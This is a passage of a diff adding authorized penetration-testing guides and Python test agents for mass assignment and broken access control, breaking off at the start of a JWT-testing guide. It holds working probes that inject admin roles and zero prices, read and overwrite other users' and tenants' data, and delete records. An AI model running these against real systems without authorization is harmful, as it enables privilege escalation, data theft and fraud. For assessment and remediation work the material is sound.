+| Express/Mongoose | `{"$set": {"role": "admin"}}` |
+| Spring Boot | `{"authorities": [{"authority": "ROLE_ADMIN"}]}` |
+
+## OWASP API3:2023 Mitigations
+
+| Mitigation | Description |
+|-----------|-------------|
+| DTO/Input Schema | Explicit allowed fields per endpoint |
+| Strong parameters | Framework allowlist (Rails) |
+| Serializer fields | Django REST serializer definition |
+| Property filter | Drop unknown fields before binding |
+
+## Test Tools
+
+| Tool | Purpose |
+|------|---------|
+| Burp Repeater | Manual parameter injection |
+| Param Miner (Burp) | Hidden parameter discovery |
+| Arjun | Automated parameter fuzzing |
+| Postman | Request body manipulation |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `requests` | >=2.28 | HTTP API calls |
+| `json` | stdlib | Payload construction |
+
+## References
+
+- OWASP API3:2023: https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/
+- Param Miner: https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943

--- a/security/skills/testing-api-for-mass-assignment-vulnerability/scripts/agent.py
+++ b/security/skills/testing-api-for-mass-assignment-vulnerability/scripts/agent.py
@@ -1,0 +1,198 @@
+#!/usr/bin/env python3
+"""Agent for testing APIs for mass assignment vulnerabilities.
+
+Tests API endpoints for auto-binding vulnerabilities where clients
+can modify privileged fields (role, balance, permissions) by
+including extra parameters in request bodies. OWASP API3:2023.
+"""
+
+import json
+import sys
+from pathlib import Path
+from datetime import datetime
+
+try:
+    import requests
+except ImportError:
+    requests = None
+
+
+PRIVILEGE_FIELDS = {
+    "role_elevation": {"role": "admin", "user_role": "admin", "userRole": "admin",
+                       "account_type": "admin", "accountType": "admin"},
+    "admin_flags": {"is_admin": True, "isAdmin": True, "admin": True,
+                    "is_superuser": True, "isSuperuser": True},
+    "permissions": {"permissions": ["*"], "scopes": ["admin:*"],
+                    "groups": ["administrators"], "roles": ["admin"]},
+    "account_status": {"is_active": True, "verified": True,
+                       "email_verified": True, "status": "active"},
+    "financial": {"balance": 99999.99, "credit": 99999, "discount": 100,
+                  "price": 0.01},
+    "ownership": {"user_id": 1, "userId": 1, "owner_id": 1},
+    "internal": {"internal_notes": "test", "debug": True, "is_featured": True},
+    "temporal": {"created_at": "2020-01-01", "updated_at": "2020-01-01"},
+}
+
+
+class MassAssignmentTestAgent:
+    """Tests APIs for mass assignment / auto-binding vulnerabilities."""
+
+    def __init__(self, base_url, output_dir="./mass_assign_test"):
+        self.base_url = base_url.rstrip("/")
+        self.output_dir = Path(output_dir)
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        self.findings = []
+
+    def _req(self, method, path, headers=None, data=None, timeout=10):
+        if not requests:
+            return None
+        try:
+            return requests.request(method, f"{self.base_url}{path}",
+                                    headers=headers, json=data, timeout=timeout)
+        except requests.RequestException:
+            return None
+
+    def test_endpoint(self, method, path, base_payload, token):
+        """Test a writable endpoint for mass assignment."""
+        headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
+        results = []
+
+        for category, fields in PRIVILEGE_FIELDS.items():
+            test_payload = {**base_payload, **fields}
+            resp = self._req(method, path, headers=headers, data=test_payload)
+            if not resp or resp.status_code not in (200, 201):
+                continue
+
+            try:
+                resp_data = resp.json()
+            except (json.JSONDecodeError, ValueError):
+                continue
+
+            for field_name, injected in fields.items():
+                actual = resp_data.get(field_name)
+                if actual is not None and str(actual) == str(injected):
+                    finding = {
+                        "endpoint": f"{method} {path}",
+                        "category": category,
+                        "field": field_name,
+                        "injected": injected,
+                        "confirmed": True,
+                    }
+                    results.append(finding)
+                    severity = "critical" if category in ("role_elevation", "admin_flags", "financial") else "high"
+                    self.findings.append({
+                        "severity": severity,
+                        "type": "Mass Assignment",
+                        "detail": f"{method} {path}: {field_name}={injected} accepted",
+                        "owasp": "API3:2023",
+                    })
+        return results
+
+    def verify_state_change(self, token, verification_path="/users/me",
+                             field_name=None, expected_value=None):
+        """Verify injected field persisted in the database."""
+        headers = {"Authorization": f"Bearer {token}"}
+        resp = self._req("GET", verification_path, headers=headers)
+        if not resp or resp.status_code != 200:
+            return False
+        data = resp.json()
+        actual = data.get(field_name)
+        return actual is not None and str(actual) == str(expected_value)
+
+    def test_registration(self, register_path="/auth/register", base_payload=None):
+        """Test registration endpoint for mass assignment."""
+        base = base_payload or {
+            "email": "massassign_test@example.com",
+            "password": "SecureP@ss123!",
+            "name": "Test User",
+        }
+        results = []
+        for category, fields in PRIVILEGE_FIELDS.items():
+            test_payload = {**base, **fields}
+            resp = self._req("POST", register_path, data=test_payload)
+            if not resp or resp.status_code not in (200, 201):
+                continue
+            try:
+                resp_data = resp.json()
+            except (json.JSONDecodeError, ValueError):
+                continue
+            for field_name, injected in fields.items():
+                actual = resp_data.get(field_name)
+                if actual is not None and str(actual) == str(injected):
+                    results.append({
+                        "endpoint": f"POST {register_path}",
+                        "field": field_name,
+                        "injected": injected,
+                    })
+                    self.findings.append({
+                        "severity": "critical",
+                        "type": "Registration Mass Assignment",
+                        "detail": f"Registration accepts {field_name}={injected}",
+                    })
+        return results
+
+    def test_financial_manipulation(self, token, order_path="/orders"):
+        """Test order/financial endpoints for price manipulation."""
+        headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
+        payloads = [
+            {"items": [{"product_id": 1, "quantity": 1}], "total": 0.01},
+            {"items": [{"product_id": 1, "quantity": 1}], "discount_percent": 100},
+            {"items": [{"product_id": 1, "quantity": 1}], "shipping_cost": 0, "tax": 0},
+        ]
+        results = []
+        for payload in payloads:
+            resp = self._req("POST", order_path, headers=headers, data=payload)
+            if resp and resp.status_code in (200, 201):
+                try:
+                    data = resp.json()
+                    total = float(data.get("total", 999))
+                    if total < 1.0:
+                        results.append({"payload": payload, "total": total})
+                        self.findings.append({
+                            "severity": "critical",
+                            "type": "Price Manipulation",
+                            "detail": f"Order created with total={total}",
+                        })
+                except (ValueError, TypeError, json.JSONDecodeError):
+                    pass
+        return results
+
+    def generate_report(self, token=None, endpoints=None):
+        registration = self.test_registration()
+        endpoint_results = []
+        if token and endpoints:
+            for ep in endpoints:
+                results = self.test_endpoint(
+                    ep["method"], ep["path"], ep.get("base_payload", {}), token
+                )
+                endpoint_results.extend(results)
+
+        report = {
+            "report_date": datetime.utcnow().isoformat(),
+            "base_url": self.base_url,
+            "registration_results": registration,
+            "endpoint_results": endpoint_results,
+            "findings": self.findings,
+            "total_findings": len(self.findings),
+        }
+        out = self.output_dir / "mass_assignment_report.json"
+        with open(out, "w") as f:
+            json.dump(report, f, indent=2)
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("Usage: agent.py <base_url> [--token <jwt>]")
+        sys.exit(1)
+    url = sys.argv[1]
+    token = None
+    if "--token" in sys.argv:
+        token = sys.argv[sys.argv.index("--token") + 1]
+    agent = MassAssignmentTestAgent(url)
+    agent.generate_report(token)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-for-broken-access-control/SKILL.md
+++ b/security/skills/testing-for-broken-access-control/SKILL.md
@@ -1,0 +1,367 @@
+---
+name: testing-for-broken-access-control
+description: Systematically testing web applications for broken access control vulnerabilities
+  including privilege escalation, missing function-level checks, and insecure direct
+  object references.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- penetration-testing
+- access-control
+- authorization
+- owasp
+- privilege-escalation
+- web-security
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+- T1068
+---
+
+# Testing for Broken Access Control
+
+## When to Use
+
+- During authorized penetration tests as the primary assessment for OWASP A01:2021 - Broken Access Control
+- When evaluating role-based access control (RBAC) implementations across all application endpoints
+- For testing multi-tenant applications where users in one organization should not access another's data
+- When assessing API endpoints for missing or inconsistent authorization checks
+- During security audits where privilege escalation and unauthorized access are primary concerns
+
+## Prerequisites
+
+- **Authorization**: Written penetration testing agreement for the target
+- **Burp Suite Professional**: With Authorize extension for automated access control testing
+- **Multiple test accounts**: Accounts at each role level (admin, manager, user, guest)
+- **Application role matrix**: Documentation of what each role should and should not access
+- **curl/httpie**: For manual endpoint testing with different authentication contexts
+- **ffuf**: For discovering hidden endpoints that may lack access controls
+
+## Workflow
+
+### Step 1: Map All Endpoints and Create Access Control Matrix
+
+Document every endpoint and the expected access level for each role.
+
+```bash
+# Extract all endpoints from Burp Site Map
+# Target > Site Map > Right-click > Copy URLs in this host
+
+# Build a matrix of endpoints vs roles:
+# | Endpoint              | Admin | Manager | User | Guest |
+# |-----------------------|-------|---------|------|-------|
+# | GET /admin/dashboard  | Allow | Deny    | Deny | Deny  |
+# | GET /api/users        | Allow | Allow   | Deny | Deny  |
+# | PUT /api/users/{id}   | Allow | Deny    | Own  | Deny  |
+# | DELETE /api/posts/{id} | Allow | Allow   | Own  | Deny  |
+
+# Discover hidden endpoints
+ffuf -u "https://target.example.com/FUZZ" \
+  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
+  -mc 200,301,302,403 -fc 404 \
+  -H "Authorization: Bearer $USER_TOKEN" \
+  -o endpoints.json -of json
+
+# API endpoint discovery
+ffuf -u "https://target.example.com/api/v1/FUZZ" \
+  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
+  -mc 200,201,204,301,302,401,403,405 -fc 404 \
+  -H "Authorization: Bearer $USER_TOKEN"
+```
+
+### Step 2: Configure Automated Access Control Testing
+
+Set up Burp Authorize extension for parallel role-based testing.
+
+```
+# Install Authorize extension:
+# Burp > Extender > BApp Store > Search "Authorize" > Install
+
+# Configuration for three-tier testing:
+# 1. Browse the application as Admin (capture all requests)
+# 2. In Authorize tab:
+#    a. Add Regular User's session token in "Replace cookies/headers"
+#    b. Optionally add a second row for Unauthenticated (no auth header)
+
+# Example header replacement setup:
+# Row 1 (Low-privilege user):
+#   Cookie: session=low_priv_user_session
+#   Authorization: Bearer low_priv_token
+#
+# Row 2 (Unauthenticated):
+#   [Empty - removes all auth headers]
+
+# Enable interception in Authorize:
+# - Check "Intercept requests from Proxy"
+# - Check "Intercept requests from Repeater"
+
+# Authorize shows results as:
+# Green  = Properly restricted (different response for different user)
+# Red    = POTENTIALLY VULNERABLE (same response regardless of role)
+# Orange = Uncertain (needs manual verification)
+```
+
+### Step 3: Test Vertical Privilege Escalation
+
+Attempt to access higher-privilege functionality with lower-privilege accounts.
+
+```bash
+# Collect tokens for each role
+ADMIN_TOKEN="Bearer admin_jwt_here"
+MANAGER_TOKEN="Bearer manager_jwt_here"
+USER_TOKEN="Bearer user_jwt_here"
+
+# Test admin endpoints with user token
+ADMIN_ENDPOINTS=(
+  "GET /admin/dashboard"
+  "GET /admin/users"
+  "POST /admin/users/create"
+  "PUT /admin/settings"
+  "DELETE /admin/users/5"
+  "GET /admin/logs"
+  "GET /admin/reports/export"
+  "POST /admin/backup"
+)
+
+for entry in "${ADMIN_ENDPOINTS[@]}"; do
+  method=$(echo "$entry" | cut -d' ' -f1)
+  endpoint=$(echo "$entry" | cut -d' ' -f2)
+  echo -n "$method $endpoint (as user): "
+  status=$(curl -s -o /dev/null -w "%{http_code}" \
+    -X "$method" \
+    -H "Authorization: $USER_TOKEN" \
+    -H "Content-Type: application/json" \
+    "https://target.example.com$endpoint")
+  if [ "$status" == "200" ] || [ "$status" == "201" ]; then
+    echo "VULNERABLE ($status)"
+  else
+    echo "OK ($status)"
+  fi
+done
+
+# Test with method override headers
+curl -s -o /dev/null -w "%{http_code}" \
+  -X POST \
+  -H "Authorization: $USER_TOKEN" \
+  -H "X-HTTP-Method-Override: DELETE" \
+  "https://target.example.com/admin/users/5"
+
+# Test with different HTTP methods
+for method in GET POST PUT PATCH DELETE OPTIONS HEAD; do
+  echo -n "$method /admin/users: "
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X "$method" \
+    -H "Authorization: $USER_TOKEN" \
+    "https://target.example.com/admin/users"
+  echo
+done
+```
+
+### Step 4: Test Horizontal Privilege Escalation
+
+Verify that users cannot access resources belonging to other users at the same privilege level.
+
+```bash
+# User A (ID: 101) testing access to User B's (ID: 102) resources
+USER_A_TOKEN="Bearer user_a_jwt"
+
+RESOURCES=(
+  "/api/users/102/profile"
+  "/api/users/102/orders"
+  "/api/users/102/messages"
+  "/api/users/102/documents"
+  "/api/users/102/settings"
+  "/api/users/102/payment-methods"
+)
+
+for resource in "${RESOURCES[@]}"; do
+  echo -n "GET $resource: "
+  response=$(curl -s -w "\n%{http_code}" \
+    -H "Authorization: $USER_A_TOKEN" \
+    "https://target.example.com$resource")
+  status=$(echo "$response" | tail -1)
+  body_len=$(echo "$response" | head -n -1 | wc -c)
+  if [ "$status" == "200" ] && [ "$body_len" -gt 50 ]; then
+    echo "VULNERABLE ($status, $body_len bytes)"
+  else
+    echo "OK ($status)"
+  fi
+done
+
+# Test write operations across users
+curl -s -X PUT \
+  -H "Authorization: $USER_A_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"name":"Hacked","email":"hacked@evil.com"}' \
+  "https://target.example.com/api/users/102/profile" -w "%{http_code}"
+
+# Test delete operations
+curl -s -X DELETE \
+  -H "Authorization: $USER_A_TOKEN" \
+  "https://target.example.com/api/users/102/documents/1" -w "%{http_code}"
+```
+
+### Step 5: Test Function-Level Access Control
+
+Verify that specific functions enforce authorization properly.
+
+```bash
+# Test unauthenticated access to protected endpoints
+PROTECTED_ENDPOINTS=(
+  "/api/user/profile"
+  "/api/transactions"
+  "/api/settings"
+  "/admin/dashboard"
+  "/api/export/users"
+)
+
+for endpoint in "${PROTECTED_ENDPOINTS[@]}"; do
+  echo -n "No auth: GET $endpoint: "
+  curl -s -o /dev/null -w "%{http_code}" \
+    "https://target.example.com$endpoint"
+  echo
+done
+
+# Test with expired/invalid tokens
+curl -s -o /dev/null -w "%{http_code}" \
+  -H "Authorization: Bearer invalid_token_here" \
+  "https://target.example.com/api/user/profile"
+
+# Test role manipulation in JWT claims
+# If JWT contains role claim, try modifying it
+# (requires JWT vulnerability - see JWT testing skill)
+
+# Test parameter-based role escalation
+curl -s -X PUT \
+  -H "Authorization: $USER_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"role":"admin","is_admin":true,"permissions":["admin","superuser"]}' \
+  "https://target.example.com/api/users/101/profile"
+
+# Test registration with elevated role
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d '{"email":"new@test.com","password":"Test123!","role":"admin"}' \
+  "https://target.example.com/api/auth/register"
+```
+
+### Step 6: Test Multi-Tenant Isolation
+
+Verify that tenant boundaries are enforced in multi-tenant applications.
+
+```bash
+# User in Tenant A testing access to Tenant B's resources
+TENANT_A_TOKEN="Bearer tenant_a_user_jwt"
+
+# Direct tenant resource access
+curl -s -H "Authorization: $TENANT_A_TOKEN" \
+  "https://target.example.com/api/organizations/tenant-b-id/users" | jq .
+
+curl -s -H "Authorization: $TENANT_A_TOKEN" \
+  "https://target.example.com/api/organizations/tenant-b-id/settings" | jq .
+
+# Test tenant switching via header
+curl -s -H "Authorization: $TENANT_A_TOKEN" \
+  -H "X-Tenant-ID: tenant-b-id" \
+  "https://target.example.com/api/users" | jq .
+
+# Test tenant ID in request body
+curl -s -X POST \
+  -H "Authorization: $TENANT_A_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"tenant_id":"tenant-b-id","query":"SELECT * FROM users"}' \
+  "https://target.example.com/api/reports/custom"
+
+# Enumerate tenant IDs
+ffuf -u "https://target.example.com/api/organizations/FUZZ" \
+  -w <(seq 1 100) \
+  -H "Authorization: $TENANT_A_TOKEN" \
+  -mc 200 -t 10 -rate 20
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| **Vertical Privilege Escalation** | Lower-privilege user accessing higher-privilege functionality (user -> admin) |
+| **Horizontal Privilege Escalation** | User accessing another user's resources at the same privilege level |
+| **Function-Level Access Control** | Authorization checks on specific features/functions regardless of URL |
+| **RBAC** | Role-Based Access Control - permissions assigned to roles, roles assigned to users |
+| **ABAC** | Attribute-Based Access Control - permissions based on user/resource/environment attributes |
+| **Multi-Tenant Isolation** | Ensuring data and functionality separation between different organizations/tenants |
+| **Insecure Direct Object Reference** | Accessing objects by manipulating identifiers without authorization checks |
+| **Missing Function-Level Check** | Endpoint exists but does not verify the caller has permission to invoke it |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| **Burp Suite Professional** | Request interception and role-based testing |
+| **Authorize (Burp Extension)** | Automated access control testing across sessions |
+| **AutoRepeater (Burp Extension)** | Automatically replays requests with different auth contexts |
+| **Postman** | API testing with environment switching between roles |
+| **ffuf** | Discovering hidden endpoints that may lack access controls |
+| **OWASP ZAP** | Access control testing with context-aware scanning |
+
+## Common Scenarios
+
+### Scenario 1: Admin Panel Without Auth Check
+The `/admin/dashboard` endpoint returns the admin panel when accessed with a regular user's session token. The front-end hides the admin menu, but the back-end does not enforce role checks.
+
+### Scenario 2: API Endpoint Missing Authorization
+The `DELETE /api/users/{id}` endpoint checks for authentication (valid token) but not authorization (admin role). Any authenticated user can delete any other user's account.
+
+### Scenario 3: Tenant Data Leakage
+A SaaS application uses `tenant_id` in API request headers. Changing the `X-Tenant-ID` header to another tenant's ID returns their data, bypassing tenant isolation.
+
+### Scenario 4: Mass Assignment Role Escalation
+The user profile update endpoint at `PUT /api/users/{id}` accepts a `role` field in the JSON body. Submitting `"role":"admin"` alongside a profile update elevates the user to administrator.
+
+## Output Format
+
+```
+## Broken Access Control Assessment Report
+
+**Target**: target.example.com
+**Assessment Date**: 2024-01-15
+**OWASP Category**: A01:2021 - Broken Access Control
+
+### Access Control Matrix Results
+| Endpoint | Admin | Manager | User | Guest | Expected | Actual |
+|----------|-------|---------|------|-------|----------|--------|
+| GET /admin/dashboard | 200 | 200 | 200 | 302 | Admin only | FAIL |
+| DELETE /api/users/{id} | 200 | 200 | 200 | 401 | Admin only | FAIL |
+| GET /api/users/other/profile | 200 | 200 | 200 | 401 | Own only | FAIL |
+| PUT /api/users/other/settings | 200 | 200 | 200 | 401 | Own only | FAIL |
+| GET /api/org/other-tenant | 200 | 200 | 200 | 401 | Same tenant | FAIL |
+
+### Critical Findings
+1. **Vertical Escalation**: Regular users can access /admin/* endpoints
+2. **Horizontal IDOR**: Users can read/modify other users' profiles
+3. **Tenant Isolation**: Cross-tenant data access via header manipulation
+4. **Mass Assignment**: Role escalation via profile update endpoint
+
+### Impact
+- Complete administrative access for any authenticated user
+- Full user data access across all accounts (15,000+ users)
+- Cross-tenant data breach affecting 200+ organizations
+- Account takeover via profile modification
+
+### Recommendation
+1. Implement server-side authorization checks on every endpoint
+2. Use a centralized authorization middleware/framework
+3. Enforce object-level authorization (verify ownership before access)
+4. Validate tenant context server-side, never from client headers
+5. Use allowlists for mass assignment (only permit expected fields)
+6. Implement audit logging for all access control decisions
+```

--- a/security/skills/testing-for-broken-access-control/references/api-reference.md
+++ b/security/skills/testing-for-broken-access-control/references/api-reference.md
@@ -1,0 +1,60 @@
+# API Reference: Testing for Broken Access Control
+
+## requests Library
+
+### Authentication Patterns
+```python
+# Bearer token authentication
+headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
+
+# Cookie-based authentication
+cookies = {"session": "session_value"}
+
+# Multiple methods
+resp = requests.request("DELETE", url, headers=headers)
+```
+
+## Test Categories
+
+### Vertical Privilege Escalation
+Test admin endpoints with regular user credentials:
+```python
+for endpoint in admin_endpoints:
+    resp = requests.get(url, headers=user_headers)
+    # 200 = VULNERABLE, 403 = properly restricted
+```
+
+### Horizontal Privilege Escalation (IDOR)
+Access other users' resources:
+```python
+# Replace {id} with other user's ID
+resp = requests.get(f"/api/users/{other_id}/profile", headers=user_headers)
+```
+
+### HTTP Method Override
+```python
+override_headers = ["X-HTTP-Method-Override", "X-Method-Override", "X-HTTP-Method"]
+```
+
+### Mass Assignment Fields
+| Field | Description |
+|-------|-------------|
+| `role` | User role (admin, user) |
+| `is_admin` | Boolean admin flag |
+| `permissions` | Permission array |
+| `access_level` | Numeric access level |
+| `user_type` | User type classification |
+
+## Response Status Interpretation
+| Status | Meaning |
+|--------|---------|
+| 200/201 | Access granted (potential vulnerability if unexpected) |
+| 401 | Not authenticated |
+| 403 | Authenticated but not authorized (correct behavior) |
+| 404 | Resource not found (may hide from unauthorized users) |
+| 405 | Method not allowed |
+
+## OWASP References
+- A01:2021 Broken Access Control: https://owasp.org/Top10/A01_2021-Broken_Access_Control/
+- WSTG Access Control: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/
+- IDOR Testing: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References

--- a/security/skills/testing-for-broken-access-control/scripts/agent.py
+++ b/security/skills/testing-for-broken-access-control/scripts/agent.py
@@ -1,0 +1,195 @@
+#!/usr/bin/env python3
+"""Agent for testing broken access control vulnerabilities during authorized assessments."""
+
+import requests
+import json
+import argparse
+import urllib3
+from datetime import datetime
+from urllib.parse import urljoin
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+def test_vertical_escalation(base_url, user_token, admin_endpoints):
+    """Test if a regular user can access admin endpoints."""
+    print("\n[*] Testing vertical privilege escalation...")
+    findings = []
+    headers = {"Authorization": f"Bearer {user_token}", "Content-Type": "application/json"}
+    methods = ["GET", "POST", "PUT", "DELETE"]
+    for endpoint in admin_endpoints:
+        for method in methods:
+            url = urljoin(base_url, endpoint)
+            try:
+                resp = requests.request(method, url, headers=headers, timeout=10, verify=False)
+                if resp.status_code in (200, 201, 204):
+                    findings.append({
+                        "type": "VERTICAL_ESCALATION", "method": method,
+                        "url": url, "status": resp.status_code, "severity": "CRITICAL",
+                    })
+                    print(f"  [!] VULNERABLE: {method} {endpoint} -> {resp.status_code}")
+            except requests.RequestException:
+                continue
+    print(f"[*] {len(findings)} vertical escalation findings")
+    return findings
+
+
+def test_horizontal_escalation(base_url, user_token, resource_templates, other_user_ids):
+    """Test if a user can access another user's resources."""
+    print("\n[*] Testing horizontal privilege escalation (IDOR)...")
+    findings = []
+    headers = {"Authorization": f"Bearer {user_token}", "Content-Type": "application/json"}
+    for template in resource_templates:
+        for uid in other_user_ids:
+            url = urljoin(base_url, template.replace("{id}", str(uid)))
+            try:
+                resp = requests.get(url, headers=headers, timeout=10, verify=False)
+                if resp.status_code == 200 and len(resp.text) > 50:
+                    findings.append({
+                        "type": "HORIZONTAL_ESCALATION", "url": url,
+                        "user_id": uid, "status": resp.status_code,
+                        "body_length": len(resp.text), "severity": "CRITICAL",
+                    })
+                    print(f"  [!] IDOR: GET {url} -> {resp.status_code} ({len(resp.text)} bytes)")
+            except requests.RequestException:
+                continue
+    print(f"[*] {len(findings)} horizontal escalation findings")
+    return findings
+
+
+def test_method_override(base_url, user_token, endpoint):
+    """Test HTTP method override headers for access control bypass."""
+    print(f"\n[*] Testing method override on {endpoint}...")
+    findings = []
+    url = urljoin(base_url, endpoint)
+    headers = {"Authorization": f"Bearer {user_token}", "Content-Type": "application/json"}
+    override_headers = ["X-HTTP-Method-Override", "X-Method-Override", "X-HTTP-Method"]
+    for oh in override_headers:
+        for method in ["DELETE", "PUT", "PATCH"]:
+            test_headers = {**headers, oh: method}
+            try:
+                resp = requests.post(url, headers=test_headers, timeout=10, verify=False)
+                if resp.status_code in (200, 201, 204):
+                    findings.append({
+                        "type": "METHOD_OVERRIDE_BYPASS", "url": url,
+                        "override_header": oh, "method": method,
+                        "status": resp.status_code, "severity": "HIGH",
+                    })
+                    print(f"  [!] {oh}: {method} -> {resp.status_code}")
+            except requests.RequestException:
+                continue
+    return findings
+
+
+def test_unauthenticated_access(base_url, protected_endpoints):
+    """Test if protected endpoints are accessible without authentication."""
+    print("\n[*] Testing unauthenticated access...")
+    findings = []
+    for endpoint in protected_endpoints:
+        url = urljoin(base_url, endpoint)
+        try:
+            resp = requests.get(url, timeout=10, verify=False)
+            if resp.status_code == 200 and len(resp.text) > 50:
+                findings.append({
+                    "type": "UNAUTHENTICATED_ACCESS", "url": url,
+                    "status": resp.status_code, "severity": "CRITICAL",
+                })
+                print(f"  [!] OPEN: GET {endpoint} -> {resp.status_code}")
+        except requests.RequestException:
+            continue
+    print(f"[*] {len(findings)} unauthenticated access findings")
+    return findings
+
+
+def test_mass_assignment(base_url, user_token, profile_endpoint):
+    """Test if role/privilege fields can be modified via profile update."""
+    print(f"\n[*] Testing mass assignment on {profile_endpoint}...")
+    findings = []
+    url = urljoin(base_url, profile_endpoint)
+    headers = {"Authorization": f"Bearer {user_token}", "Content-Type": "application/json"}
+    payloads = [
+        {"role": "admin"}, {"is_admin": True}, {"permissions": ["admin", "superuser"]},
+        {"user_type": "administrator"}, {"access_level": 99},
+    ]
+    for payload in payloads:
+        try:
+            resp = requests.put(url, headers=headers, json=payload, timeout=10, verify=False)
+            if resp.status_code in (200, 201):
+                field = list(payload.keys())[0]
+                resp_text = resp.text.lower()
+                if str(payload[field]).lower() in resp_text:
+                    findings.append({
+                        "type": "MASS_ASSIGNMENT", "url": url,
+                        "field": field, "value": payload[field], "severity": "CRITICAL",
+                    })
+                    print(f"  [!] VULNERABLE: {field}={payload[field]} accepted")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def test_tenant_isolation(base_url, tenant_a_token, tenant_b_resources):
+    """Test cross-tenant data access."""
+    print("\n[*] Testing tenant isolation...")
+    findings = []
+    headers = {"Authorization": f"Bearer {tenant_a_token}", "Content-Type": "application/json"}
+    for resource in tenant_b_resources:
+        url = urljoin(base_url, resource)
+        try:
+            resp = requests.get(url, headers=headers, timeout=10, verify=False)
+            if resp.status_code == 200 and len(resp.text) > 50:
+                findings.append({
+                    "type": "TENANT_ISOLATION_BREACH", "url": url,
+                    "status": resp.status_code, "severity": "CRITICAL",
+                })
+                print(f"  [!] CROSS-TENANT: {url} -> {resp.status_code}")
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def generate_report(findings, output_path):
+    """Generate access control assessment report."""
+    report = {
+        "assessment_date": datetime.now().isoformat(),
+        "total_findings": len(findings),
+        "by_type": {},
+        "by_severity": {},
+        "findings": findings,
+    }
+    for f in findings:
+        t = f.get("type", "UNKNOWN")
+        s = f.get("severity", "INFO")
+        report["by_type"][t] = report["by_type"].get(t, 0) + 1
+        report["by_severity"][s] = report["by_severity"].get(s, 0) + 1
+    with open(output_path, "w") as fh:
+        json.dump(report, fh, indent=2)
+    print(f"\n[*] Report: {output_path} | Findings: {len(findings)}")
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Broken Access Control Testing Agent")
+    parser.add_argument("base_url", help="Base URL of the target")
+    parser.add_argument("--user-token", help="Regular user's Bearer token")
+    parser.add_argument("--admin-endpoints", nargs="+",
+                        default=["/admin/dashboard", "/admin/users", "/api/admin/settings"])
+    parser.add_argument("--resource-templates", nargs="+",
+                        default=["/api/users/{id}/profile", "/api/users/{id}/orders"])
+    parser.add_argument("--other-ids", nargs="+", default=["2", "3", "100", "101"])
+    parser.add_argument("-o", "--output", default="access_control_report.json")
+    args = parser.parse_args()
+
+    print(f"[*] Broken Access Control Assessment: {args.base_url}")
+    findings = []
+    findings.extend(test_unauthenticated_access(args.base_url, args.admin_endpoints))
+    if args.user_token:
+        findings.extend(test_vertical_escalation(args.base_url, args.user_token, args.admin_endpoints))
+        findings.extend(test_horizontal_escalation(args.base_url, args.user_token,
+                                                    args.resource_templates, args.other_ids))
+        findings.extend(test_method_override(args.base_url, args.user_token, args.admin_endpoints[0]))
+        findings.extend(test_mass_assignment(args.base_url, args.user_token, "/api/users/me"))
+    generate_report(findings, args.output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-for-json-web-token-vulnerabilities/SKILL.md
+++ b/security/skills/testing-for-json-web-token-vulnerabilities/SKILL.md
@@ -1,0 +1,244 @@
+---
+name: testing-for-json-web-token-vulnerabilities
+description: Test JWT implementations for critical vulnerabilities including algorithm
+  confusion, none algorithm bypass, kid parameter injection, and weak secret exploitation
+  to achieve authentication bypass and privilege escalation.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- jwt
+- json-web-token
+- algorithm-confusion
+- authentication-bypass
+- token-forgery
+- kid-injection
+- jku-attack
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+- T1068
+---
+
+# Testing for JSON Web Token Vulnerabilities
+
+## When to Use
+- When testing applications using JWT for authentication and session management
+- During API security assessments where JWTs are used for authorization
+- When evaluating OAuth 2.0 or OpenID Connect implementations using JWT
+- During penetration testing of single sign-on (SSO) systems
+- When auditing JWT library configurations for known vulnerabilities
+
+## Prerequisites
+- jwt_tool (Python JWT exploitation toolkit)
+- Burp Suite with JWT Editor extension
+- jwt.io for decoding and inspecting JWT structure
+- Understanding of JWT structure (header.payload.signature) and algorithms (HS256, RS256)
+- hashcat or john for brute-forcing weak JWT secrets
+- Python PyJWT library for custom JWT forging scripts
+- Access to application using JWT-based authentication
+
+
+> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
+
+## Workflow
+
+### Step 1 — Decode and Analyze JWT Structure
+```bash
+# Install jwt_tool
+pip install pyjwt
+git clone https://github.com/ticarpi/jwt_tool.git
+
+# Decode JWT without verification
+python3 jwt_tool.py <JWT_TOKEN>
+
+# Decode manually with base64
+echo "<header_base64>" | base64 -d
+echo "<payload_base64>" | base64 -d
+
